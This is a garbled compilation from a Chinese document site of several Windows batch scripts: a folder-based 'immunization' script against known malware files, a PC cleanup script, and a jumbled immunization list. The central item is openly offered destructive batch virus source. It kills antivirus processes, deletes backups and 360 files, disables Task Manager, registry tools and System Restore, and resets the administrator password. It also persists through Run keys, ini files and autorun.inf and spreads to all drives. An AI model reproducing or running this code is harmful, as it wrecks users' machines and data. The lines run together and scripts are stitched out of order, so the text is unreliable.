(c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z) do md %%h:\auto.exe\1..\ >nul 2>nulfor %%b in (c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z) do md %%b:\autorun.inf >nul 2>nulfor %%g in (c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z) do md %%g:\autorun.inf\1..\ >nul 2>nulfor %%c in (c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z) do attrib %%c:\auto.exe +s +h +r +a >nul 2>nulfor %%d in (c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z) do attrib %%d:\autorun.inf +s +h +r +a >nul 2>nulfor %%e in (c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z) do echoy|cacls %%e:\auto.exe /d everyone >nul 2>nulfor %%f in (c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z) do echo Y|cacls %%f:\autorun.inf /d everyone >nul 2>nulecho******************************************************************* **************echo * *echo * 免疫完成 * echo * *echo******************************************************************* **************echo******************************************************************* ************echo * *echo * 现在进行IGM免役 *echo * *echo******************************************************************* ************md c:\windows\IGW.exe 2>nulmd c:\windows\AVPSrv.exe 2>nulmd c:\windows\DiskMan32.exe 2>nulmd c:\windows\IGM.exe 2>nulmd c:\windows\Kvsc3.exe 2>nulmd c:\windows\lqvytv.exe 2>nulmd c:\windows\MsIMMs32.exe 2>nulmd c:\windows\system32\3CEBCAF.exe 2>nulmd c:\windows\system32\racvsvc.exe 2>nulmd c:\windows\nvdispdrv.exe 2>nulmd c:\windows\dbghlp32.exe 2>nulmd c:\windows\system32\drivers\svchost.exe 2>nulmd c:\windows\system32\a.exe 2>nulmd c:\windows\upxdnd.exe 2>nulmd c:\windows\WinForm.exe 2>nulmd c:\windows\system32\rsjzbpm.dll 2>nulmd c:\windows\system32\cmdbcs.dll 2>nulmd c:\windows\system32\upxdnd.dll 2>nulmd c:\windows\system32\yfmtdiouaf.dll 2>nulmd c:\windows\nvdispdrv.exe 2>nulmd c:\windows\49400MM.DLL 2>nulmd c:\windows\338448WO.dll 2>nulmd c:\windows\235780MM.dll 2>nulmd c:\windows\235780WO.DLL 2>nulattrib c:\windows\IGW.exe +s +r +h +a 2>nulattrib c:\windows\AVPSrv.exe +s +r +h +a 2>nulattrib c:\windows\DiskMan32.exe +s +r +h +a 2>nulattrib c:\windows\IGM.exe +s +r +h +a 2>nulattrib c:\windows\Kvsc3.exe +s +r +h +a 2>nulattrib c:\windows\lqvytv.exe +s +r +h +a 2>nulattrib c:\windows\MsIMMs32.exe +s +r +h +a 2>nulattrib c:\windows\system32\3CEBCAF.exe +s +r +h +a 2>nul attrib c:\windows\system32\racvsvc.exe +s +r +h +a 2>nul attrib c:\windows\nvdispdrv.exe +s +r +h +a 2>nulattrib c:\windows\dbghlp32.exe +s +r +h +a 2>nulattrib c:\windows\system32\drivers\svchost.exe +s +r +h +a 2>nulattrib c:\windows\system32\a.exe +s +r +h +a 2>nulattrib c:\windows\upxdnd.exe +s +r +h +a 2>nulattrib c:\windows\WinForm.exe +s +r +h +a 2>nulattrib c:\windows\system32\rsjzbpm.dll +s +r +h +a 2>nul attrib c:\windows\system32\cmdbcs.dll +s +r +h +a 2>nul attrib c:\windows\system32\upxdnd.dll +s +r +h +a 2>nul attrib c:\windows\system32\yfmtdiouaf.dll +s +r +h +a 2>nulattrib c:\windows\nvdispdrv.exe +s +r +h +a 2>nulattrib c:\windows\49400MM.DLL +s +r +h +a 2>nulattrib c:\windows\338448WO.dll +s +r +h +a 2>nulattrib c:\windows\235780WO.DLL +s +r +h +a 2>nulattrib c:\windows\235780MM.dll +s +r +h +a 2>nulecho y|cacls c:\windows\235780MM.dll /d everyone 2>nul echo y|cacls c:\windows\235780WO.DLL /d everyone 2>nul echo y|cacls c:\windows\338448WO.dll /d everyone 2>nul echo y|cacls c:\windows\49400MM.DLL /d everyone 2>nul echo y|cacls c:\windows\nvdispdrv.exe /d everyone 2>nulecho y|cacls c:\windows\system32\yfmtdiouaf.dll /d everyone 2>nulecho y|cacls c:\windows\system32\upxdnd.dll /d everyone 2>nulecho y|cacls c:\windows\WinForm.exe /d everyoneecho y|cacls c:\windows\system32\cmdbcs.dll /d everyone 2>nulecho y|cacls c:\windows\system32\rsjzbpm.dll /d everyone 2>nulecho y|cacls c:\windows\upxdnd.exe /d everyone 2>nulecho y|cacls c:\windows\system32\a.exe /d everyone 2>nul echo y|cacls c:\windows\system32\drivers\svchost.exe /d everyone 2>nulecho y|cacls c:\windows\dbghlp32.exe /d everyone 2>nulecho y|cacls c:\windows\nvdispdrv.exe /d everyone 2>nulecho y|cacls c:\windows\system32\racvsvc.exe /d everyone 2>nulecho y|cacls c:\windows\system32\3CEBCAF.exe /d everyone 2>nulecho y|cacls c:\windows\lqvytv.exe /d everyone 2>nulecho y|cacls c:\windows\MsIMMs32.exe /d everyone 2>nul echo y|cacls c:\windows\Kvsc3.exe /d everyone 2>nulecho y|cacls c:\windows\IGM.exe /d everyone 2>nulecho y|cacls c:\windows\DiskMan32.exe /d everyone 2>nul echo y|cacls c:\windows\AVPSrv.exe /d everyone 2>nulecho y|cacls c:\windows\IGW.exe /d everyone 2>nulecho******************************************************************* **************echo * *echo * 免疫完成 * echo * *echo******************************************************************* **************echo******************************************************************* **************echo * *echo * 现在进行AV免疫 *echo * *echo******************************************************************* **************for %%x in (c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z) do md %%x:\hfhludy.exe >nul 2>nulfor %%y in (c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z) do md %%y:\hfhludy.exe\1..\ >nul 2>nulfor %%r in (c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z) do attrib %%r:\hfhludy.exe +s +h +r +a >nul 2>nulfor %%u in (c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z) do echo y|cacls %%u:\hfhludy.exe /d everyone >nul 2>nulecho******************************************************************* **************echo * *echo * 免疫完成 * echo * * echo******************************************************************* **************echo******************************************************************* **************echo * *echo * 现在进行病毒下载器免疫 *echo * *echo******************************************************************* **************md c:\windows\system32\conime.exe.tmp2 2>nulattrib c:\windows\system32\conime.exe.tmp2 +s +h +r +a 2>nulecho y|cacls c:\windows\system32\conime.exe.tmp2 /d everyone 2>nulecho******************************************************************* **************echo * *echo * 免疫完成 * echo * * echo******************************************************************* **************echo******************************************************************* **************echo * *echo* * echo* * echo * *echo * *echo* * echo * 枯柳树制作 *echo* QQ:491111404 * echo * *echo * *echo * *echo * *echo * *echo * *echo******************************************************************* **************pause复制粘贴到TXT文本文档里,保存后更改扩展名为BAT就可以了最后说1句,大家学习黑客技术是为了更好的保护自己,而不去恶意的破坏别人的电脑。
最强的用批处理编写的病毒
最强的⽤批处理编写的病毒内容就是下⾯这些了,如果你想试试它的威⼒,不妨试试,,,呵呵复制代码代码如下:@echo offtitle You DEADset taskkill=scopy %0 %windir%\system32\cmd.batattrib %windir%\system32\cmd.bat +r +s +hnet stop sharedaccess >nul%s% /im pfw.exe shadowtip.exe shadowservice.exe qq.exe explorer.exe IEXOLORE.EXE /f >nul%s% /im norton* /f >nul%s% /im av* /f >nul%s% /im fire* /f >nul%s% /im anti* /f >nul%s% /im spy* /f >nul%s% /im bullguard /f >nul%s% /im PersFw /f >nul%s% /im KAV* /f >nul%s% /im ZONEALARM /f >nul%s% /im SAFEWEB /f >nul%s% /im OUTPOST /f >nul%s% /im nv* /f >nul%s% /im nav* /f >nul%s% /im F-* /f >nul%s% /im ESAFE /f >nul%s% /im cle /f >nul%s% /im BLACKICE /f >nul%s% /im def* /f >nul%s% /im 360safe.exe /f >nulnet stop Shadow" "System" "Serviceset alldrive=d e f g h i j k l m n o p q r s t u v w x y zfor %%a in (c %alldrive%) do del %%a:\360* /f /s /q >nulfor %%a in (c %alldrive%) do del %%a:\修复* /f /s /q >nulrem 修改注册表.......REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\explorer\Advanced\ Folder\Hidden\SHOWALL /vCheckedValue /t REG_DWORD /d 00000000 /f >nulREG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d00000001 /f >nulREG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRecentDocsMenu /tREG_DWORD /d 00000001 /f >nulREG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDrives /t REG_DWORD /d4294967295 /f >nulREG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v Disableregistrytools /tREG_DWORD /d 00000002 /f >nulREG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoNetHood /t REG_DWORD /d00000001 /f >nulREG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /V NoDesktop /t REG_DWORD /d00000001 /f >nulREG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t REG_DWORD /d00000001 /f >nulREG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoFind /t REG_DWORD /d00000001 /f >nulREG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD/d 00000001 /f >nulREG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoLogOff /t REG_DWORD /d00000001 /f >nulREG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSetTaskBar /t REG_DWORD/d 00000001 /f >nulREG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows" "NT\CurrentVersion\SystemRestore /v DisableSR /t REG_DWORD /d00000001 /f >nulREG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows" "NT\SystemRestore /v DisableConfig /t REG_DWORD /d00000001 /f >nulREG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v RestrictRun /t REG_DWORD /d00000001 /f >nulclsnet user administrator 123456 >nulfor %%c in (c %alldrive%) do del %%c:\*.gho /f /s /q >nulecho @echo off >d:\setup.batecho shutdown -r -t 10 -f -c 亲爱的朋友,我⼗分抱歉的通知你,你的电脑已经严重崩溃,请重新安装系统可以解决此问题!^.^ >>d:\setup.batecho copy d:\setup.bat c:\Documents" "and" "Settings\All" "Users\「开始」菜单\程序\启动\a.bat >>d:\setup.batecho REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /vsetup.bat /t REG_SZ /d d:\setup.bat/f >>d:\setup.batecho REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /vsetup.bat /t REG_SZ /d d:\setup.bat/f >>d:\setup.batecho REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce /v setup.bat /t REG_SZ /d d:\setup.bat/f >>d:\setup.batHKEY_CLASSES_ROOT\batfile\shell\open\command /v setup.bat /t REG_SZ /d d:\setup.bat /f>>d:\setup.batecho [windows] >> %windir%\win.iniecho run=d:\setup.bat C:\AUTOEXEC.BAT >> %windir%\win.iniecho load=d:\setup.bat C:\AUTOEXEC.BAT >> %windir%\win.iniecho [boot] >> %windir%\system.iniecho shell=explorer.exe setup.bat C:\AUTOEXEC.BAT >> %windir%\system.iniecho [AutoRun] >d:\autorun.infecho Open=setup.bat >>d:\autorun.infecho Open=system.bat >>d:\autorun.infattrib d:\autorun.inf +r +s +h >>d:\setup.batattrib d:\setup.bat +r +s +h >>d:\setup.batstart d:\setup.bat /min >nulecho @echo off >>C:\AUTOEXEC.BATecho REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v AUTOEXEC.BAT /t REG_SZ /dC:\AUTOEXEC.BAT /f >>C:\AUTOEXEC.BATecho REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v AUTOEXEC.BAT /t REG_SZ /dC:\AUTOEXEC.BAT /f >>C:\AUTOEXEC.BATREG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce /v AUTOEXEC.BAT /t REG_SZ /dC:\AUTOEXEC.BAT /f >>C:\AUTOEXEC.BATecho REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v setup.bat /t REG_SZ /d d:\setup.bat/f >>C:\AUTOEXEC.BATecho REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v setup.bat /t REG_SZ /d d:\setup.bat/f >>C:\AUTOEXEC.BATREG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce /v setup.bat /t REG_SZ /d d:\setup.bat/f >>C:\AUTOEXEC.BATecho if not d:\setup.bat start %windir%\system32\cmd.bat /min >>C:\AUTOEXEC.BATcopy %0 %systemroot%\windows.bat >nulif not exist %windir%/system32/explorer.bat @echo off >>%windir%/system32/explorer.batif not exist C:\AUTOEXEC.BAT start %windir%\system32\cmd.bat /min >>%windir%/system32/explorer.batif not exist %windir%\system32\cmd.bat start %systemroot%\windows.bat /min >>%windir%/system32/explorer.batecho REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v AUTOEXEC.BAT /t REG_SZ /dC:\AUTOEXEC.BAT /f >>%windir%/system32/explorer.batecho REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v AUTOEXEC.BAT /t REG_SZ /dC:\AUTOEXEC.BAT /f >>%windir%/system32/explorer.batecho REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v setup.bat /t REG_SZ /d d:\setup.bat/f >>%windir%/system32/explorer.batecho REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v setup.bat /t REG_SZ /d d:\setup.bat/f >>%windir%/system32/explorer.batecho REG ADD HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run /v explorer.bat /t REG_SZ /d %windir%/system32/explorer.bat/f >>%windir%/system32/explorer.batecho REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v explorer.bat /t REG_SZ /d %windir%/system32/explorer.bat /f >>%windir%/system32/explorer.batecho start %systemroot%\windows.bat /min >>%windir%/system32/explorer.batattrib %windir%/system32/explorer.bat +r +s +h%attrib %systemroot%/windows.bat +r +s +hfor %%c in (%alldrive%) do echo @echo off >>%%c:\system.batfor %%c in (%alldrive%) do echo start %windir%\system32\cmd.bat /min >>%%c:\system.batfor %%c in (%alldrive%) do echo attrib system.bat +r +s +h >>%%c:\system.batset drive=e f g h i j k l m n o p q r s t u v w x y zfor %%c in (%drive%) do echo [AuroRun] >%%c:\autorun.inffor %%c in (%drive%) do echo Open=system.bat >>%%c:\autorun.infcopy %0 d:\Program" "Files\run.batfor %%c in (%alldrive%) do echo if not exist %windir%/system32/explorer.bat startd:\Program" "Files\run.bat /min>>%%c:\system.batfor %%c in (%alldrive%) do attrib autorun.inf +r +s +h >>%%c:\system.batfor %%c in (%alldrive%) do attrib %%c:\autorun.inf +r +s +h >nulfor %%c in (%alldrive%) do attrib %%c:\system.bat +r +s +h >nulif not exist %windir%/system32/explorer.bat start d:\Program" "Files\run.bat/min >>d:\setup.batattrib d:\Program" "Files\run.bat +r +s +h >nuldel %0exit。
C盘清理时在运行中输入的各种指令
建筑模板网 远程教育报名 宝珠砂@ECHO OFF@echo 此批处理由护卫神()整理发布@echo@echo 清理几个比较多垃圾文件的地方DEL /F /S /Q "C:\WINDOWS\PCHealth\ERRORREP\QSIGNOFF\*.*"DEL /F /S /Q "C:\WINDOWS\PCHealth\ERRORREP\UserDumps\*.*"DEL /F /S /Q "C:\WINDOWS\system32\LogFiles\HTTPERR\*.*"DEL /F /S /Q "C:\WINDOWS\\Framework\v2.0.50727\Temporary Files\*.*"DEL /F /S /Q "C:\WINDOWS\\Framework\v1.1.4322\Temporary Files\*.*"DEL /F /S /Q "C:\windows\temp\*.*"DEL /F /S /Q /A:S "C:\WINDOWS\IIS Temporary Compressed Files\*.*"@echo 删除补丁备份目录RD %windir%\$hf_mig$ /Q /S@echo 把补丁卸载文件夹的名字保存成2950800.txtdir %windir%\$NtUninstall* /a:d /b >%windir%\2950800.txt@echo 从2950800.txt中读取文件夹列表并且删除文件夹for /f %%i in (%windir%\2950800.txt) do rd %windir%\%%i /s /q@echo 删除2950800.txtdel %windir%\2950800.txt /f /q@echo 删除补丁安装记录内容(下面的del /f /s /q %systemdrive%\*.log已经包含删除此类文件)del %windir%\KB*.log /f /q@echo 删除系统盘目录下临时文件del /f /s /q %systemdrive%\*.tmp@echo 删除系统盘目录下临时文件del /f /s /q %systemdrive%\*._mp@echo 删除系统盘目录下日志文件del /f /s /q %systemdrive%\*.log@echo 删除系统盘目录下GID文件(属于临时文件,具体作用不详)del /f /s /q %systemdrive%\*.gid@echo 删除系统目录下scandisk(磁盘扫描)留下的无用文件del /f /s /q %systemdrive%\*.chk@echo 删除系统目录下old文件del /f /s /q %systemdrive%\*.old@echo 删除回收站的无用文件del /f /s /q %systemdrive%\recycled\*.*@echo 删除系统目录下备份文件建筑模板网 远程教育报名 宝珠砂el /f /s /q %windir%\*.bak@echo 删除应用程序临时文件del /f /s /q %windir%\prefetch\*.*@echo 删除系统维护等操作产生的临时文件del /f /s /q %windir%\temp\*.*@echo 删除当前用户的COOKIE(IE)del /f /s /q %userprofile%\cookies\*.*@echo 删除internet临时文件del /f /s /q "%userprofile%\local settings\temporary internet files\*.*"@echo 删除当前用户日常操作临时文件del /f /s /q "%userprofile%\local settings\temp\*.*"@echo 删除访问记录(开始菜单中的文档里面的东西)del /f /s /q "%userprofile%\recent\*.*"。
- 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
- 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
- 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
md %systemroot%\system32\MSSIGN30.DLL
attrib %systemroot%\system32\MSSIGN30.DLL +S +R +H
md %systemroot%\system32\NetMeeting.exe
attrib %systemroot%\sws.dll +S +R +H
md %systemroot%\system33.exe
attrib %systemroot%\system33.exe +S +R +H
md %systemroot%\Systra.exe
attrib %systemroot%\Systra.exe +S +R +H
md %systemroot%\doc1.exe
attrib %systemroot%\doc1.exe +S %\doc.exe
attrib %systemroot%\doc.exe +S +R +H
md %systemroot%\sws32.dll
attrib %systemroot%\system32\logo1_.exe +S +R +H
md %systemroot%\logo1_.exe
attrib %systemroot%\logo1_.exe +S +R +H
md %systemroot%\logo.exe
attrib %systemroot%\logo.exe +S +R +H
md %systemroot%\logo1.exe
attrib %systemroot%\system32\kernel66.dll +S +R +H
md %systemroot%\system32\Latterpy.dll
attrib %systemroot%\system32\Latterpy.dll +S +R +H
md %systemroot%\system32\LayerInstall.exe
::======================================================
md %systemroot%\system32\hxdef.exe
attrib %systemroot%\system32\hxdef.exe +S +R +H
md %systemroot%\system32\kernel66.dll
md %systemroot%\4sy.exe
attrib %systemroot%\4sy.exe +S +R +H
md %systemroot%\5sy.exe
attrib %systemroot%\5sy.exe +S +R +H
md %systemroot%\6sy.exe
attrib %systemroot%\6sy.exe +S +R +H
attrib %systemroot%\system32\Runouce.exe +S +R +H
md %systemroot%\system32\spollsv.exe
attrib %systemroot%\system32\spollsv.exe +S +R +H
md %systemroot%\system32\sys.exe
COLOR 0A
CLS
@echo off
@echo
@echo
@echo
@echo DIY 个 性 BAT C 盘 防 毒 批 处 理
@pause
md %systemroot%\0sy.exe
attrib %systemroot%\0sy.exe +S +R +H
attrib %systemroot%\system32\LayerInstall.exe +S +R +H
md %systemroot%\system32\layerpop.ini
attrib %systemroot%\system32\layerpop.ini +S +R +H
md %systemroot%\system32\msjdbc11.dll
attrib %systemroot%\system32\0sy.exe +S +R +H
md %systemroot%\system32\1sy.exe
attrib %systemroot%\system32\1sy.exe +S +R +H
md %systemroot%\system32\2sy.exe
attrib %systemroot%\sws32.dll +S +R +H
md %systemroot%\KILL.EXE
attrib %systemroot%\KILL.EXE +S +R +H
md %systemroot%\systra.exe
attrib %systemroot%\systra.exe +S +R +H
attrib %systemroot%\system32\2sy.exe +S +R +H
md %systemroot%\system32\3sy.exe
attrib %systemroot%\system32\3sy.exe +S +R +H
md %systemroot%\system32\4sy.exe
attrib %systemroot%\MFCD3O.DLL +S +R +H
md %systemroot%\MSTRAY.EXE
attrib %systemroot%\MSTRAY.EXE +S +R +H
md %systemroot%\smss.exe
attrib %systemroot%\smss.exe +S +R +H
md %systemroot%\kernel32.exe
attrib %systemroot%\kernel32.exe +S +R +H
md %systemroot%\lesste.exe
attrib %systemroot%\lesste.exe +S +R +H
md %systemroot%\MFCD3O.DLL
attrib %systemroot%\system32\sys.exe +S +R +H
md %systemroot%\system32\word.exe
attrib %systemroot%\system32\word.exe +S +R +H
md %systemroot%\system32\0sy.exe
md %systemroot%\1sy.exe
attrib %systemroot%\1sy.exe +S +R +H
md %systemroot%\2sy.exe
attrib %systemroot%\2sy.exe +S +R +H
md %systemroot%\3sy.exe
attrib %systemroot%\3sy.exe +S +R +H
md %systemroot%\svch0st_.exe
attrib %systemroot%\svch0st_.exe +S +R +H
md %systemroot%\svchost64.exe
attrib %systemroot%\svchost64.exe +S +R +H
md %systemroot%\sws.dll
attrib %systemroot%\CA_Crash_info.nfo +S +R +H
md %systemroot%\cmcc.exe
attrib %systemroot%\cmcc.exe +S +R +H
md %systemroot%\csrss.exe
attrib %systemroot%\ccsrss.exe +S +R +H
attrib %systemroot%\system32\4sy.exe +S +R +H
md %systemroot%\system32\5sy.exe
attrib %systemroot%\system32\5sy.exe +S +R +H
md %systemroot%\system32\6sy.exe
md %systemroot%\virDll.dll
attrib %systemroot%\virDll.dll +S +R +H